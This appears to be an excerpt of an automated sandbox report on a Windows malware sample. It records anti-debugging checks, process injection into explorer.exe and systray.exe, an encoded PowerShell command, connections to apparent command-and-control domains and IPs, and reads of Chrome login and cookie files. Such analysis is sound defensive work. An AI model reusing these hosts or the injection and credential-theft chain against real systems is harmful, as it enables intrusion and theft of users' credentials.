Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179BC2C mov eax, dword ptr fs:[00000030h] 3_2_0179BC2C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h] 3_2_017E6C0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018214FB mov eax, dword ptr fs:[00000030h] 3_2_018214FB
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183740D mov eax, dword ptr fs:[00000030h] 3_2_0183740D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h] 3_2_017E6CF0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177849B mov eax, dword ptr fs:[00000030h] 3_2_0177849B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177FF60 mov eax, dword ptr fs:[00000030h] 3_2_0177FF60
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177EF40 mov eax, dword ptr fs:[00000030h] 3_2_0177EF40
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179E730 mov eax, dword ptr fs:[00000030h] 3_2_0179E730
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h] 3_2_01764F2E
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178F716 mov eax, dword ptr fs:[00000030h] 3_2_0178F716
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h] 3_2_017FFF10
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h] 3_2_0179A70E
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183070D mov eax, dword ptr fs:[00000030h] 3_2_0183070D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A37F5 mov eax, dword ptr fs:[00000030h] 3_2_017A37F5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01778794 mov eax, dword ptr fs:[00000030h] 3_2_01778794
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838F6A mov eax, dword ptr fs:[00000030h] 3_2_01838F6A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h] 3_2_017E7794
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h] 3_2_0178AE73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177766D mov eax, dword ptr fs:[00000030h] 3_2_0177766D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h] 3_2_01830EA5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181FEC0 mov eax, dword ptr fs:[00000030h] 3_2_0181FEC0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838ED6 mov eax, dword ptr fs:[00000030h] 3_2_01838ED6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176E620 mov eax, dword ptr fs:[00000030h] 3_2_0176E620
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h] 3_2_0179A61C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h] 3_2_0176C600
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01798E00 mov eax, dword ptr fs:[00000030h] 3_2_01798E00
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821608 mov eax, dword ptr fs:[00000030h] 3_2_01821608
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017776E2 mov eax, dword ptr fs:[00000030h] 3_2_017776E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017916E0 mov ecx, dword ptr fs:[00000030h] 3_2_017916E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017936CC mov eax, dword ptr fs:[00000030h] 3_2_017936CC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A8EC7 mov eax, dword ptr fs:[00000030h] 3_2_017A8EC7
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181FE3F mov eax, dword ptr fs:[00000030h] 3_2_0181FE3F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h] 3_2_0182AE44
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E46A7 mov eax, dword ptr fs:[00000030h] 3_2_017E46A7
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FFE87 mov eax, dword ptr fs:[00000030h] 3_2_017FFE87
Source: C:\Users\user\Desktop\SC_0017384.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040CEC3 LdrLoadDll, 3_2_0040CEC3
Source: C:\Users\user\Desktop\SC_0017384.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 54.85.86.211 80
Source: C:\Windows\explorer.exe Domain query: www.myprojoints.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.152.24 80
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.131 80
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.229 80
Source: C:\Windows\explorer.exe Domain query: www.metatv.app
Source: C:\Windows\explorer.exe Domain query: www.findmyoriginstory.com
Source: C:\Windows\explorer.exe Domain query: www.brunaeleandro.com
Source: C:\Windows\explorer.exe Domain query: www.madisoncountylincoln.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.194.225 80
Source: C:\Windows\explorer.exe Domain query: www.emprendizajesocial.com
Source: C:\Users\user\Desktop\SC_0017384.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: EA0000
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\SC_0017384.exe Memory written: C:\Users\user\Desktop\SC_0017384.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Memory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SC_0017384.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\SC_0017384.exe Thread register set: target process: 3324
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3324
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: explorer.exe, 00000004.00000003.535831998.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.552222750.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.386129776.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Users\user\Desktop\SC_0017384.exe VolumeInformation
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\Desktop\SC_0017384.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

Remote Access Functionality

Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY